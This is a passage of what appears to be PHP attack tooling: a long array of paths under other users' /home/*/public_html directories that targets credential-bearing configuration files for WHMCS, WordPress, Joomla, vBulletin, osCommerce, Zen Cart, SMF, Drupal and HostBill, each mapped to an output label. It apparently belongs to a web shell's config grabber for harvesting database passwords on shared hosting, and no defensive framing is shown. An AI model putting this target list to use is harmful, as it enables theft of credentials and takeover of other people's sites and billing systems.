694. "/home/$user_idx/public_html/public_html/whm/WHMCS/configuration.php" => "-whm-WHMCS",
695. "/home/$user_idx/public_html/public_html/whmc/WHM/configuration.php" => "-whmc-WHM",
696. "/home/$user_idx/public_html/public_html/whmcs/configuration.php" => "-whmc-WHMCS",
697. "/home/$user_idx/public_html/public_html/supp/configuration.php" => "-supp-WHMCS",
698. "/home/$user_idx/public_html/public_html/secure/configuration.php" => "-sucure-WHMCS",
699. "/home/$user_idx/public_html/public_html/secure/whm/configuration.php" => "-sucure-whm-WHMCS",
700. "/home/$user_idx/public_html/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs-WHMCS",
701. "/home/$user_idx/public_html/public_html/panel/configuration.php" => "-panel-WHMCS",
702. "/home/$user_idx/public_html/public_html/hosts/configuration.php" => "-hosts-WHMCS",
703. "/home/$user_idx/public_html/public_html/submitticket.php" => "-submitticket-WHMCS",
704. "/home/$user_idx/public_html/public_html/clients/configuration.php" => "-clients-WHMCS",
705. "/home/$user_idx/public_html/public_html/clientes/configuration.php" => "-clientes-WHMCS",
706. "/home/$user_idx/public_html/public_html/cliente/configuration.php" => "-client-WHMCS",
707. "/home/$user_idx/public_html/public_html/billing/configuration.php" => "-billing-WHMCS",
708. "/home/$user_idx/public_html/public_html/manage/configuration.php" => "-whm-manage-WHMCS",
709. "/home/$user_idx/public_html/public_html/my/configuration.php" => "-whm-my-WHMCS",
710. "/home/$user_idx/public_html/public_html/myshop/configuration.php" => "-whm-myshop-WHMCS",
711. "/home/$user_idx/public_html/public_html/billings/configuration.php" => "-billings-WHMCS",
712. "/home/$user_idx/public_html/public_html/supports/configuration.php" => "-supports-WHMCS",
713. "/home/$user_idx/public_html/public_html/auto/configuration.php" => "-auto-WHMCS",
714. "/home/$user_idx/public_html/public_html/go/configuration.php" => "-go-WHMCS",
715. "/home/$user_idx/public_html/public_html/' . $user . '/configuration.php" => "-USERNAME-WHMCS",
716. "/home/$user_idx/public_html/public_html/bill/configuration.php" => "-bill-WHMCS",
717. "/home/$user_idx/public_html/public_html/payment/configuration.php" => "-payment-WHMCS",
718. "/home/$user_idx/public_html/public_html/pay/configuration.php" => "-pay-WHMCS",
719. "/home/$user_idx/public_html/public_html/purchase/configuration.php" => "-purchase-WHMCS",
720. "/home/$user_idx/public_html/public_html/clientarea/configuration.php" => "-clientarea-WHMCS",
721. "/home/$user_idx/public_html/public_html/autobuy/configuration.php" => "-autobuy-WHMCS",
722. "/home/$user_idx/public_html/public_html/config.php" => "-2",
723. "/home/$user_idx/public_html/public_html/connect.php" => "-8",
724. "/home/$user_idx/public_html/public_html/include/config.php" => "-12",
725. "/home/$user_idx/public_html/public_html/vb/includes/config.php" => "-vb",
726. "/home/$user_idx/public_html/public_html/vb3/includes/config.php" => "-vb3",
727. "/home/$user_idx/public_html/public_html/whm/configuration.php" => "-whm15",
728. "/home/$user_idx/public_html/public_html/central/configuration.php" => "-whm-central",
729. "/home/$user_idx/public_html/public_html/whmcs/configuration.php" => "-whmcs",
730. "/home/$user_idx/public_html/public_html/support/configuration.php" => "-support",
731. "/home/$user_idx/public_html/public_html/supp/configuration.php" => "-supp",
732. "/home/$user_idx/public_html/public_html/secure/configuration.php" => "-sucure",
733. "/home/$user_idx/public_html/public_html/secure/whm/configuration.php" => "-sucure-whm",
734. "/home/$user_idx/public_html/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs",
735. "/home/$user_idx/public_html/public_html/cpanel/configuration.php" => "-cpanel",
736. "/home/$user_idx/public_html/public_html/panel/configuration.php" => "-panel",
737. "/home/$user_idx/public_html/public_html/host/configuration.php" => "-host",
738. "/home/$user_idx/public_html/public_html/hosting/configuration.php" => "-hosting",
739. "/home/$user_idx/public_html/public_html/hosts/configuration.php" => "-hosts",
740. "/home/$user_idx/public_html/public_html/submitticket.php" => "-whmcs2",
741. "/home/$user_idx/public_html/public_html/clients/configuration.php" => "-clients",
742. "/home/$user_idx/public_html/public_html/client/configuration.php" => "-client",
743. "/home/$user_idx/public_html/public_html/clientes/configuration.php" => "-clientes",
744. "/home/$user_idx/public_html/public_html/cliente/configuration.php" => "-client",
745. "/home/$user_idx/public_html/public_html/clientsupport/configuration.php" => "-clientsupport",
746. "/home/$user_idx/public_html/public_html/billing/configuration.php" => "-billing",
747. "/home/$user_idx/public_html/public_html/manage/configuration.php" => "-whm-manage",
748. "/home/$user_idx/public_html/public_html/my/configuration.php" => "-whm-my",
749. "/home/$user_idx/public_html/public_html/myshop/configuration.php" => "-whm-myshop",
750. "/home/$user_idx/public_html/public_html/includes/configure.php" => "-shop",
751. "/home/$user_idx/public_html/public_html/os/includes/configure.php" => "-shop-os",
752. "/home/$user_idx/public_html/public_html/oscom/includes/configure.php" => "-oscom",
753. "/home/$user_idx/public_html/public_html/oscommerce/includes/configure.php" => "-oscommerce",
754. "/home/$user_idx/public_html/public_html/oscommerces/includes/configure.php" => "-oscommerces",
755. "/home/$user_idx/public_html/public_html/shop/includes/configure.php" => "-shop2",
756. "/home/$user_idx/public_html/public_html/shopping/includes/configure.php" => "-shop-shopping",
757. "/home/$user_idx/public_html/public_html/sale/includes/configure.php" => "-sale",
758. "/home/$user_idx/public_html/public_html/amember/config.TXT.php" => "-amember",
759. "/home/$user_idx/public_html/public_html/config.TXT.php" => "-amember2",
760. "/home/$user_idx/public_html/public_html/members/configuration.php" => "-members",
761. "/home/$user_idx/public_html/public_html/config.php" => "-4images1",
762. "/home/$user_idx/public_html/public_html/forum/includes/config.php" => "-forum",
763. "/home/$user_idx/public_html/public_html/forums/includes/config.php" => "-forums",
764. "/home/$user_idx/public_html/public_html/admin/conf.php" => "-5",
765. "/home/$user_idx/public_html/public_html/admin/config.php" => "-4",
766. "/home/$user_idx/public_html/public_html/wp-config.php" => "-wp13",
767. "/home/$user_idx/public_html/public_html/wp/wp-config.php" => "-wp13-wp",
768. "/home/$user_idx/public_html/public_html/WP/wp-config.php" => "-wp13-WP",
769. "/home/$user_idx/public_html/public_html/wp/beta/wp-config.php" => "-wp13-wp-beta",
770. "/home/$user_idx/public_html/public_html/beta/wp-config.php" => "-wp13-beta",
771. "/home/$user_idx/public_html/public_html/press/wp-config.php" => "-wp13-press",
772. "/home/$user_idx/public_html/public_html/wordpress/wp-config.php" => "-wp13-wordpress",
773. "/home/$user_idx/public_html/public_html/Wordpress/wp-config.php" => "-wp13-Wordpress",
774. "/home/$user_idx/public_html/public_html/blog/wp-config.php" => "-wp13-Wordpress",
775. "/home/$user_idx/public_html/public_html/wordpress/beta/wp-config.php" => "-wp13-wordpress-beta",
776. "/home/$user_idx/public_html/public_html/news/wp-config.php" => "-wp13-news",
777. "/home/$user_idx/public_html/public_html/new/wp-config.php" => "-wp13-new",
778. "/home/$user_idx/public_html/public_html/blog/wp-config.php" => "-wp-blog",
779. "/home/$user_idx/public_html/public_html/beta/wp-config.php" => "-wp-beta",
780. "/home/$user_idx/public_html/public_html/blogs/wp-config.php" => "-wp-blogs",
781. "/home/$user_idx/public_html/public_html/home/wp-config.php" => "-wp-home",
782. "/home/$user_idx/public_html/public_html/protal/wp-config.php" => "-wp-protal",
783. "/home/$user_idx/public_html/public_html/site/wp-config.php" => "-wp-site",
784. "/home/$user_idx/public_html/public_html/main/wp-config.php" => "-wp-main",
785. "/home/$user_idx/public_html/public_html/test/wp-config.php" => "-wp-test",
786. "/home/$user_idx/public_html/public_html/arcade/functions/dbclass.php" => "-ibproarcade",
787. "/home/$user_idx/public_html/public_html/joomla/configuration.php" => "-joomla2",
788. "/home/$user_idx/public_html/public_html/protal/configuration.php" => "-joomla-protal",
789. "/home/$user_idx/public_html/public_html/joo/configuration.php" => "-joo",
790. "/home/$user_idx/public_html/public_html/cms/configuration.php" => "-joomla-cms",
791. "/home/$user_idx/public_html/public_html/site/configuration.php" => "-joomla-site",
792. "/home/$user_idx/public_html/public_html/main/configuration.php" => "-joomla-main",
793. "/home/$user_idx/public_html/public_html/news/configuration.php" => "-joomla-news",
794. "/home/$user_idx/public_html/public_html/new/configuration.php" => "-joomla-new",
795. "/home/$user_idx/public_html/public_html/home/configuration.php" => "-joomla-home",
796. "/home/$user_idx/public_html/public_html/vb/includes/config.php" => "-vb-config",
797. "/home/$user_idx/public_html/public_html/vb3/includes/config.php" => "-vb3-config",
798. "/home/$user_idx/public_html/public_html/cc/includes/config.php" => "-vb1-config",
799. "/home/$user_idx/public_html/public_html/includes/config.php" => "-includes-vb",
800. "/home/$user_idx/public_html/public_html/forum/includes/class_core.php" => "-vbluttin-class_core.php",
801. "/home/$user_idx/public_html/public_html/vb/includes/class_core.php" => "-vbluttin-class_core.php1",
802. "/home/$user_idx/public_html/public_html/cc/includes/class_core.php" => "-vbluttin-class_core.php2",
803. "/home/$user_idx/public_html/public_html/whm/configuration.php" => "-whm15",
804. "/home/$user_idx/public_html/public_html/central/configuration.php" => "-whm-central",
805. "/home/$user_idx/public_html/public_html/whm/whmcs/configuration.php" => "-whm-whmcs",
806. "/home/$user_idx/public_html/public_html/whm/WHMCS/configuration.php" => "-whm-WHMCS",
807. "/home/$user_idx/public_html/public_html/whmc/WHM/configuration.php" => "-whmc-WHM",
808. "/home/$user_idx/public_html/public_html/whmcs/configuration.php" => "-whmcs",
809. "/home/$user_idx/public_html/public_html/support/configuration.php" => "-support",
810. "/home/$user_idx/public_html/public_html/supp/configuration.php" => "-supp",
811. "/home/$user_idx/public_html/public_html/secure/configuration.php" => "-sucure",
812. "/home/$user_idx/public_html/public_html/secure/whm/configuration.php" => "-sucure-whm",
813. "/home/$user_idx/public_html/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs",
814. "/home/$user_idx/public_html/public_html/cpanel/configuration.php" => "-cpanel",
815. "/home/$user_idx/public_html/public_html/panel/configuration.php" => "-panel",
816. "/home/$user_idx/public_html/public_html/host/configuration.php" => "-host",
817. "/home/$user_idx/public_html/public_html/hosting/configuration.php" => "-hosting",
818. "/home/$user_idx/public_html/public_html/hosts/configuration.php" => "-hosts",
819. "/home/$user_idx/public_html/public_html/configuration.php" => "-joomla",
820. "/home/$user_idx/public_html/public_html/submitticket.php" => "-whmcs2",
821. "/home/$user_idx/public_html/public_html/clients/configuration.php" => "-clients",
822. "/home/$user_idx/public_html/public_html/client/configuration.php" => "-client",
823. "/home/$user_idx/public_html/public_html/clientes/configuration.php" => "-clientes",
824. "/home/$user_idx/public_html/public_html/cliente/configuration.php" => "-client",
825. "/home/$user_idx/public_html/public_html/clientsupport/configuration.php" => "-clientsupport",
826. "/home/$user_idx/public_html/public_html/billing/configuration.php" => "-billing",
827. "/home/$user_idx/public_html/public_html/manage/configuration.php" => "-whm-manage",
828. "/home/$user_idx/public_html/public_html/my/configuration.php" => "-whm-my",
829. "/home/$user_idx/public_html/public_html/myshop/configuration.php" => "-whm-myshop",
830. "/home/$user_idx/public_html/public_html/includes/dist-configure.php" => "-zencart",
831. "/home/$user_idx/public_html/public_html/zencart/includes/dist-configure.php" => "-shop-zencart",
832. "/home/$user_idx/public_html/public_html/shop/includes/dist-configure.php" => "-shop-ZCshop",
833. "/home/$user_idx/public_html/public_html/Settings.php" => "-smf",
834. "/home/$user_idx/public_html/public_html/smf/Settings.php" => "-smf2",
835. "/home/$user_idx/public_html/public_html/forum/Settings.php" => "-smf-forum",
836. "/home/$user_idx/public_html/public_html/forums/Settings.php" => "-smf-forums",
837. "/home/$user_idx/public_html/public_html/upload/includes/config.php" => "-up",
838. "/home/$user_idx/public_html/public_html/article/config.php" => "-Nwahy",
839. "/home/$user_idx/public_html/public_html/up/includes/config.php" => "-up2",
840. "/home/$user_idx/public_html/public_html/conf_global.php" => "-6",
841. "/home/$user_idx/public_html/public_html/include/db.php" => "-7",
842. "/home/$user_idx/public_html/public_html/connect.php" => "-PHP-Fusion",
843. "/home/$user_idx/public_html/public_html/mk_conf.php" => "-9",
844. "/home/$user_idx/public_html/public_html/includes/config.php" => "-traidnt1",
845. "/home/$user_idx/public_html/public_html/config.php" => "-4images",
846. "/home/$user_idx/public_html/public_html/sites/default/settings.php" => "-Drupal",
847. "/home/$user_idx/public_html/public_html/member/configuration.php" => "-1member.TXT",
848. "/home/$user_idx/public_html/public_html/billings/configuration.php" => "-billings.TXT",
849. "/home/$user_idx/public_html/public_html/whm/configuration.php" => "-whm",
850. "/home/$user_idx/public_html/public_html/supports/configuration.php" => "-supports",
851. "/home/$user_idx/public_html/public_html/requires/config.php" => "-AM4SS-hosting",
852. "/home/$user_idx/public_html/public_html/supports/includes/iso4217.php" => "-hostbills-supports",
853. "/home/$user_idx/public_html/public_html/client/includes/iso4217.php" => "-hostbills-client",
854. "/home/$user_idx/public_html/public_html/support/includes/iso4217.php" => "-hostbills-support",
855. "/home/$user_idx/public_html/public_html/billing/includes/iso4217.php" => "-hostbills-billing",
856. "/home/$user_idx/public_html/public_html/billings/includes/iso4217.php" => "-hostbills-billings",
857. "/home/$user_idx/public_html/public_html/host/includes/iso4217.php" => "-hostbills-host",
858. "/home/$user_idx/public_html/public_html/hosts/includes/iso4217.php" => "-hostbills-hosts",
859. "/home/$user_idx/public_html/public_html/hosting/includes/iso4217.php" => "-hostbills-hosting",
860. "/home/$user_idx/public_html/public_html/hostings/includes/iso4217.php" => "-hostbills-hostings",
861. "/home/$user_idx/public_html/public_html/includes/iso4217.php" => "-hostbills",
862. "/home/$user_idx/public_html/public_html/hostbills/includes/iso4217.php" => "-hostbills-hostbills",
863. "/home/$user_idx/public_html/public_html/hostbill/includes/iso4217.php" => "-hostbills-hostbill",
864. "/home/$user_idx/public_html/includes/configure.php" => "-shop",
865. "/home/$user_idx/public_html/os/includes/configure.php" => "-shop-os",
866. "/home/$user_idx/public_html/oscom/includes/configure.php" => "-oscom",
867. "/home/$user_idx/public_html/oscommerce/includes/configure.php" => "-oscommerce",
868. "/home/$user_idx/public_html/oscommerces/includes/configure.php" => "-oscommerces",
869. "/home/$user_idx/public_html/shop/includes/configure.php" => "-shop2",
870. "/home/$user_idx/public_html/shopping/includes/configure.php" => "-shop-shopping",
871. "/home/$user_idx/public_html/sale/includes/configure.php" => "-sale",
872. "/home/$user_idx/public_html/amember/config.TXT.php" => "-amember",
873. "/home/$user_idx/public_html/config.TXT.php" => "-amember2",
874. "/home/$user_idx/public_html/members/configuration.php" => "-members",
875. "/home/$user_idx/public_html/config.php" => "-2",
876. "/home/$user_idx/public_html/forum/includes/config.php" => "-forum",
877. "/home/$user_idx/public_html/forums/includes/config.php" => "-forums",
878. "/home/$user_idx/public_html/admin/conf.php" => "-5",
879. "/home/$user_idx/public_html/admin/config.php" => "-4",
880. "/home/$user_idx/public_html/wp-config.php" => "-wp13",
881. "/home/$user_idx/public_html/wp/wp-config.php" => "-wp13-wp",
882. "/home/$user_idx/public_html/WP/wp-config.php" => "-wp13-WP",
883. "/home/$user_idx/public_html/wp/beta/wp-config.php" => "-wp13-wp-beta",
884. "/home/$user_idx/public_html/beta/wp-config.php" => "-wp13-beta",
885. "/home/$user_idx/public_html/press/wp-config.php" => "-wp13-press",
886. "/home/$user_idx/public_html/wordpress/wp-config.php" => "-wp13-wordpress",
887. "/home/$user_idx/public_html/Wordpress/wp-config.php" => "-wp13-Wordpress",
888. "/home/$user_idx/public_html/wordpress/beta/wp-config.php" => "-wp13-wordpress-beta",
889. "/home/$user_idx/public_html/news/wp-config.php" => "-wp13-news",
890. "/home/$user_idx/public_html/new/wp-config.php" => "-wp13-new",
891. "/home/$user_idx/public_html/blog/wp-config.php" => "-wp-blog",
892. "/home/$user_idx/public_html/beta/wp-config.php" => "-wp-beta",
893. "/home/$user_idx/public_html/blogs/wp-config.php" => "-wp-blogs",
894. "/home/$user_idx/public_html/home/wp-config.php" => "-wp-home",
895. "/home/$user_idx/public_html/protal/wp-config.php" => "-wp-protal",
896. "/home/$user_idx/public_html/site/wp-config.php" => "-wp-site",
897. "/home/$user_idx/public_html/main/wp-config.php" => "-wp-main",
898. "/home/$user_idx/public_html/test/wp-config.php" => "-wp-test",
899. "/home/$user_idx/public_html/conf_global.php" => "-6",
900. "/home/$user_idx/public_html/include/db.php" => "-7",
901. "/home/$user_idx/public_html/connect.php" => "-8",
902. "/home/$user_idx/public_html/mk_conf.php" => "-9",
903. "/home/$user_idx/public_html/include/config.php" => "-12",
904. "/home/$user_idx/public_html/joomla/configuration.php" => "-joomla2",
905. "/home/$user_idx/public_html/protal/configuration.php" => "-joomla-protal",
906. "/home/$user_idx/public_html/joo/configuration.php" => "-joo",
907. "/home/$user_idx/public_html/cms/configuration.php" => "-joomla-cms",
908. "/home/$user_idx/public_html/site/configuration.php" => "-joomla-site",
909. "/home/$user_idx/public_html/main/configuration.php" => "-joomla-main",
910. "/home/$user_idx/public_html/news/configuration.php" => "-joomla-news",
911. "/home/$user_idx/public_html/new/configuration.php" => "-joomla-new",
912. "/home/$user_idx/public_html/home/configuration.php" => "-joomla-home",
913. "/home/$user_idx/public_html/vb/includes/config.php" => "-vb",
914. "/home/$user_idx/public_html/vb3/includes/config.php" => "-vb3",
915. "/home/$user_idx/public_html/includes/config.php" => "-includes-vb",
916. "/home/$user_idx/public_html/whm/configuration.php" => "-whm15",
917. "/home/$user_idx/public_html/central/configuration.php" => "-whm-central",
918. "/home/$user_idx/public_html/whm/whmcs/configuration.php" => "-whm-whmcs",
919. "/home/$user_idx/public_html/whm/WHMCS/configuration.php" => "-whm-WHMCS",
920. "/home/$user_idx/public_html/whmc/WHM/configuration.php" => "-whmc-WHM",
921. "/home/$user_idx/public_html/whmcs/configuration.php" => "-whmcs",
922. "/home/$user_idx/public_html/support/configuration.php" => "-support",
923. "/home/$user_idx/public_html/supp/configuration.php" => "-supp",
924. "/home/$user_idx/public_html/secure/configuration.php" => "-sucure",
925. "/home/$user_idx/public_html/secure/whm/configuration.php" => "-sucure-whm",
926. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs",
927. "/home/$user_idx/public_html/cpanel/configuration.php" => "-cpanel",
928. "/home/$user_idx/public_html/panel/configuration.php" => "-panel",
929. "/home/$user_idx/public_html/host/configuration.php" => "-host",
930. "/home/$user_idx/public_html/hosting/configuration.php" => "-hosting",
931. "/home/$user_idx/public_html/hosts/configuration.php" => "-hosts",
932. "/home/$user_idx/public_html/configuration.php" => "-joomla",
933. "/home/$user_idx/public_html/submitticket.php" => "-whmcs2",
934. "/home/$user_idx/public_html/clients/configuration.php" => "-clients",
935. "/home/$user_idx/public_html/client/configuration.php" => "-client",
936. "/home/$user_idx/public_html/clientes/configuration.php" => "-clientes",
937. "/home/$user_idx/public_html/cliente/configuration.php" => "-client",
938. "/home/$user_idx/public_html/clientsupport/configuration.php" => "-clientsupport",
939. "/home/$user_idx/public_html/billing/configuration.php" => "-billing",
940. "/home/$user_idx/public_html/manage/configuration.php" => "-whm-manage",
941. "/home/$user_idx/public_html/my/configuration.php" => "-whm-my",
942. "/home/$user_idx/public_html/myshop/configuration.php" => "-whm-myshop",
943. "/home/$user_idx/public_html/includes/dist-configure.php" => "-zencart",
944. "/home/$user_idx/public_html/zencart/includes/dist-configure.php" => "-shop-zencart",
945. "/home/$user_idx/public_html/shop/includes/dist-configure.php" => "-shop-ZCshop",
946. "/home/$user_idx/public_html/Settings.php" => "-smf",
947. "/home/$user_idx/public_html/smf/Settings.php" => "-smf2",
948. "/home/$user_idx/public_html/forum/Settings.php" => "-smf-forum",
949. "/home/$user_idx/public_html/forums/Settings.php" => "-smf-forums",
950. "/home/$user_idx/public_html/upload/includes/config.php" => "-up",
951. "/home/$user_idx/public_html/up/includes/config.php" => "-up2",
952. "/home/$user_idx/public_html/includes/configure.php" => "-shop",
953. "/home/$user_idx/public_html/os/includes/configure.php" => "-shop-os",
954. "/home/$user_idx/public_html/oscom/includes/configure.php" => "-oscom",
955. "/home/$user_idx/public_html/oscommerce/includes/configure.php" => "-oscommerce",
956. "/home/$user_idx/public_html/oscommerces/includes/configure.php" => "-oscommerces",
957. "/home/$user_idx/public_html/shop/includes/configure.php" => "-shop2",
958. "/home/$user_idx/public_html/shopping/includes/configure.php" => "-shop-shopping",
959. "/home/$user_idx/public_html/sale/includes/configure.php" => "-sale",
960. "/home/$user_idx/public_html/amember/config.TXT.php" => "-amember",
961. "/home/$user_idx/public_html/config.TXT.php" => "-amember2",
962. "/home/$user_idx/public_html/members/configuration.php" => "-members",
963. "/home/$user_idx/public_html/config.php" => "-4images1",
964. "/home/$user_idx/public_html/forum/includes/config.php" => "-forum",
965. "/home/$user_idx/public_html/forums/includes/config.php" => "-forums",
966. "/home/$user_idx/public_html/admin/conf.php" => "-5",
967. "/home/$user_idx/public_html/admin/config.php" => "-4",
968. "/home/$user_idx/public_html/wp-config.php" => "-wp13",
969. "/home/$user_idx/public_html/wp/wp-config.php" => "-wp13-wp",
970. "/home/$user_idx/public_html/WP/wp-config.php" => "-wp13-WP",
971. "/home/$user_idx/public_html/wp/beta/wp-config.php" => "-wp13-wp-beta",
972. "/home/$user_idx/public_html/beta/wp-config.php" => "-wp13-beta",
973. "/home/$user_idx/public_html/press/wp-config.php" => "-wp13-press",
974. "/home/$user_idx/public_html/wordpress/wp-config.php" => "-wp13-wordpress",
975. "/home/$user_idx/public_html/Wordpress/wp-config.php" => "-wp13-Wordpress",
976. "/home/$user_idx/public_html/blog/wp-config.php" => "-wp13-Wordpress",
977. "/home/$user_idx/public_html/wordpress/beta/wp-config.php" => "-wp13-wordpress-beta",
978. "/home/$user_idx/public_html/news/wp-config.php" => "-wp13-news",
979. "/home/$user_idx/public_html/new/wp-config.php" => "-wp13-new",
980. "/home/$user_idx/public_html/blog/wp-config.php" => "-wp-blog",
981. "/home/$user_idx/public_html/beta/wp-config.php" => "-wp-beta",
982. "/home/$user_idx/public_html/blogs/wp-config.php" => "-wp-blogs",
983. "/home/$user_idx/public_html/home/wp-config.php" => "-wp-home",
984. "/home/$user_idx/public_html/protal/wp-config.php" => "-wp-protal",
985. "/home/$user_idx/public_html/site/wp-config.php" => "-wp-site",
986. "/home/$user_idx/public_html/main/wp-config.php" => "-wp-main",
987. "/home/$user_idx/public_html/test/wp-config.php" => "-wp-test",
988. "/home/$user_idx/public_html/arcade/functions/dbclass.php" => "-ibproarcade",
989. "/home/$user_idx/public_html/joomla/configuration.php" => "-joomla2",
990. "/home/$user_idx/public_html/protal/configuration.php" => "-joomla-protal",
991. "/home/$user_idx/public_html/joo/configuration.php" => "-joo",
992. "/home/$user_idx/public_html/cms/configuration.php" => "-joomla-cms",
993. "/home/$user_idx/public_html/site/configuration.php" => "-joomla-site",
994. "/home/$user_idx/public_html/main/configuration.php" => "-joomla-main",
995. "/home/$user_idx/public_html/news/configuration.php" => "-joomla-news",
996. "/home/$user_idx/public_html/new/configuration.php" => "-joomla-new",
997. "/home/$user_idx/public_html/home/configuration.php" => "-joomla-home",
998. "/home/$user_idx/public_html/vb/includes/config.php" => "-vb-config",
999. "/home/$user_idx/public_html/vb3/includes/config.php" => "-vb3-config",
1000. "/home/$user_idx/public_html/cc/includes/config.php" => "-vb1-config",
1001. "/home/$user_idx/public_html/includes/config.php" => "-includes-vb",
1002. "/home/$user_idx/public_html/forum/includes/class_core.php" => "-vbluttin-class_core.php",
1003. "/home/$user_idx/public_html/vb/includes/class_core.php" => "-vbluttin-class_core.php1",
1004. "/home/$user_idx/public_html/cc/includes/class_core.php" => "-vbluttin-class_core.php2",
1005. "/home/$user_idx/public_html/whm/configuration.php" => "-whm15",
1006. "/home/$user_idx/public_html/central/configuration.php" => "-whm-central",
1007. "/home/$user_idx/public_html/whm/whmcs/configuration.php" => "-whm-whmcs",
1008. "/home/$user_idx/public_html/whm/WHMCS/configuration.php" => "-whm-WHMCS",
1009. "/home/$user_idx/public_html/whmc/WHM/configuration.php" => "-whmc-WHM",
1010. "/home/$user_idx/public_html/whmcs/configuration.php" => "-whmcs",
1011. "/home/$user_idx/public_html/support/configuration.php" => "-support",
1012. "/home/$user_idx/public_html/supp/configuration.php" => "-supp",
1013. "/home/$user_idx/public_html/secure/configuration.php" => "-sucure",
1014. "/home/$user_idx/public_html/secure/whm/configuration.php" => "-sucure-whm",
1015. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs",
1016. "/home/$user_idx/public_html/cpanel/configuration.php" => "-cpanel",
1017. "/home/$user_idx/public_html/panel/configuration.php" => "-panel",
1018. "/home/$user_idx/public_html/host/configuration.php" => "-host",
1019. "/home/$user_idx/public_html/hosting/configuration.php" => "-hosting",
1020. "/home/$user_idx/public_html/hosts/configuration.php" => "-hosts",
1021. "/home/$user_idx/public_html/configuration.php" => "-joomla",
1022. "/home/$user_idx/public_html/submitticket.php" => "-whmcs2",
1023. "/home/$user_idx/public_html/clients/configuration.php" => "-clients",
1024. "/home/$user_idx/public_html/client/configuration.php" => "-client",
1025. "/home/$user_idx/public_html/clientes/configuration.php" => "-clientes",
1026. "/home/$user_idx/public_html/cliente/configuration.php" => "-client",
1027. "/home/$user_idx/public_html/clientsupport/configuration.php" => "-clientsupport",
1028. "/home/$user_idx/public_html/billing/configuration.php" => "-billing",
1029. "/home/$user_idx/public_html/manage/configuration.php" => "-whm-manage",
1030. "/home/$user_idx/public_html/my/configuration.php" => "-whm-my",
1031. "/home/$user_idx/public_html/myshop/configuration.php" => "-whm-myshop",
1032. "/home/$user_idx/public_html/includes/dist-configure.php" => "-zencart",
1033. "/home/$user_idx/public_html/zencart/includes/dist-configure.php" => "-shop-zencart",
1034. "/home/$user_idx/public_html/shop/includes/dist-configure.php" => "-shop-ZCshop",
1035. "/home/$user_idx/public_html/Settings.php" => "-smf",
1036. "/home/$user_idx/public_html/smf/Settings.php" => "-smf2",
1037. "/home/$user_idx/public_html/forum/Settings.php" => "-smf-forum",
1038. "/home/$user_idx/public_html/forums/Settings.php" => "-smf-forums",
1039. "/home/$user_idx/public_html/upload/includes/config.php" => "-up",
1040. "/home/$user_idx/public_html/article/config.php" => "-Nwahy",
1041. "/home/$user_idx/public_html/up/includes/config.php" => "-up2",
1042. "/home/$user_idx/public_html/conf_global.php" => "-6",
1043. "/home/$user_idx/public_html/include/db.php" => "-7",
1044. "/home/$user_idx/public_html/connect.php" => "-PHP-Fusion",
1045. "/home/$user_idx/public_html/mk_conf.php" => "-9",
1046. "/home/$user_idx/public_html/includes/config.php" => "-traidnt1",
1047. "/home/$user_idx/public_html/config.php" => "-4images",
1048. "/home/$user_idx/public_html/sites/default/settings.php" => "-Drupal",
1049. "/home/$user_idx/public_html/member/configuration.php" => "-1member.TXT",
1050. "/home/$user_idx/public_html/billings/configuration.php" => "-billings.TXT",
1051. "/home/$user_idx/public_html/whm/configuration.php" => "-whm",
1052. "/home/$user_idx/public_html/supports/configuration.php" => "-supports",
1053. "/home/$user_idx/public_html/requires/config.php" => "-AM4SS-hosting",
1054. "/home/$user_idx/public_html/supports/includes/iso4217.php" => "-hostbills-supports",
1055. "/home/$user_idx/public_html/client/includes/iso4217.php" => "-hostbills-client",
1056. "/home/$user_idx/public_html/support/includes/iso4217.php" => "-hostbills-support",
1057. "/home/$user_idx/public_html/billing/includes/iso4217.php" => "-hostbills-billing",
1058. "/home/$user_idx/public_html/billings/includes/iso4217.php" => "-hostbills-billings",
1059. "/home/$user_idx/public_html/host/includes/iso4217.php" => "-hostbills-host",
1060. "/home/$user_idx/public_html/hosts/includes/iso4217.php" => "-hostbills-hosts",
1061. "/home/$user_idx/public_html/hosting/includes/iso4217.php" => "-hostbills-hosting",
1062. "/home/$user_idx/public_html/hostings/includes/iso4217.php" => "-hostbills-hostings",
1063. "/home/$user_idx/public_html/includes/iso4217.php" => "-hostbills",
1064. "/home/$user_idx/public_html/hostbills/includes/iso4217.php" => "-hostbills-hostbills",
1065. "/home/$user_idx/public_html/hostbill/includes/iso4217.php" => "-hostbills-hostbill",
1066. "/home/$user_idx/public_html/config.php" => "-4images1",
1067. "/home/$user_idx/public_html/blog/wp-config.php" => "-wp13-Wordpress",
1068. "/home/$user_idx/public_html/arcade/functions/dbclass.php" => "-ibproarcade",
1069. "/home/$user_idx/public_html/vb/includes/config.php" => "-vb-config",
1070. "/home/$user_idx/public_html/vb3/includes/config.php" => "-vb3-config",
1071. "/home/$user_idx/public_html/cc/includes/config.php" => "-vb1-config",
1072. "/home/$user_idx/public_html/forum/includes/class_core.php" => "-vbluttin-class_core.php",
1073. "/home/$user_idx/public_html/vb/includes/class_core.php" => "-vbluttin-class_core.php1",
1074. "/home/$user_idx/public_html/cc/includes/class_core.php" => "-vbluttin-class_core.php2",
1075. "/home/$user_idx/public_html/article/config.php" => "-Nwahy",
1076. "/home/$user_idx/public_html/connect.php" => "-PHP-Fusion",
1077. "/home/$user_idx/public_html/includes/config.php" => "-traidnt1",
1078. "/home/$user_idx/public_html/config.php" => "-4images",
1079. "/home/$user_idx/public_html/sites/default/settings.php" => "-Drupal",
1080. "/home/$user_idx/public_html/member/configuration.php" => "-1member",
1081. "/home/$user_idx/public_html/supports/includes/iso4217.php" => "-hostbills-supports",
1082. "/home/$user_idx/public_html/client/includes/iso4217.php" => "-hostbills-client",
1083. "/home/$user_idx/public_html/support/includes/iso4217.php" => "-hostbills-support",
1084. "/home/$user_idx/public_html/billing/includes/iso4217.php" => "-hostbills-billing",
1085. "/home/$user_idx/public_html/billings/includes/iso4217.php" => "-hostbills-billings",
1086. "/home/$user_idx/public_html/host/includes/iso4217.php" => "-hostbills-host",
1087. "/home/$user_idx/public_html/hosts/includes/iso4217.php" => "-hostbills-hosts",
1088. "/home/$user_idx/public_html/hosting/includes/iso4217.php" => "-hostbills-hosting",
1089. "/home/$user_idx/public_html/hostings/includes/iso4217.php" => "-hostbills-hostings",
1090. "/home/$user_idx/public_html/includes/iso4217.php" => "-hostbills",
